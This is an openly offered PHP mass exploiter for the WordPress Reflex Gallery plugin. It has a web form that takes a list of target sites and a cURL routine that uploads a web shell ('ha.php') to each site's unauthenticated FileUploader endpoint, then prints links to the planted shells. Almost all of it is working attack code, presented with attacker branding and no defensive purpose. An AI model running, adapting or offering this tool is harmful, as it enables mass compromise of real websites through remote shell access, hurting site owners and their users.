WordPress ReflexGallery mass exploiter

visit my blog => www.annamcoder.tk

CUT HERE --------------------------------------------------------------------------------------------------------------------------

<center><br><br>
<font color="lime" size="6">
<b>WP ReflexGallery exploiter</b></font>
<br><br>
<form action="" method="POST">
<textarea name="url" style="margin: 0px; width: 626px; height: 236px;">put your target without http://
example :

www.site.com
www.site2.com
www.site3.com
www.site4.com
www.site5.com
</textarea><br>
<br><br><input type="submit" class="btn btn-success" value="-=[ GO TO HELL SOON ]=-"/>
<br><br>
<?php
#===============================================#
#------------WP Reflex Gallery Exploiter----------#
#------------Coded By Synchronizer--------------#
#-Gretz : Stupidc0de - IDCA - Indonesian Coder--#
#===============================================#
if(isset($_POST['url'])) {
function StupidC0de($URL) {
if(!function_exists('curl_init')) {
die ("Curl PHP package not installed");
}
$uploadfile= "ha.php"; #Your shell here
$synchronizer = curl_init();
curl_setopt($synchronizer, CURLOPT_POST, true);
curl_setopt($synchronizer, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($synchronizer, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($synchronizer, CURLOPT_URL, $URL);
curl_setopt($synchronizer, CURLOPT_HEADER, false);
$response = curl_exec($synchronizer);
return $response;
}
$textarea = htmlspecialchars(trim($_POST['url']));
$j = explode("\r\n",$textarea);
foreach($j as $sync){
$n = StupidC0de($sync."/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php");
$b = str_replace('{"success":true,"fileName":"\/\/\/', "", $n);
$c = str_replace('"}', "", $b);
$d = $sync."/wp-content/uploads/".$c;
if(preg_match('/{"success":true,"/',$n)==1) {
echo "<center><a href='http://$d' target='_blank'><font color=lime>$d</font></a> - <font color=green><b>SUKSES</b></font></center><br>";
} else {
echo "<center>".$sync."<font color=red><b> - FAILED !</b></font></center><br>";
}
}
}
?>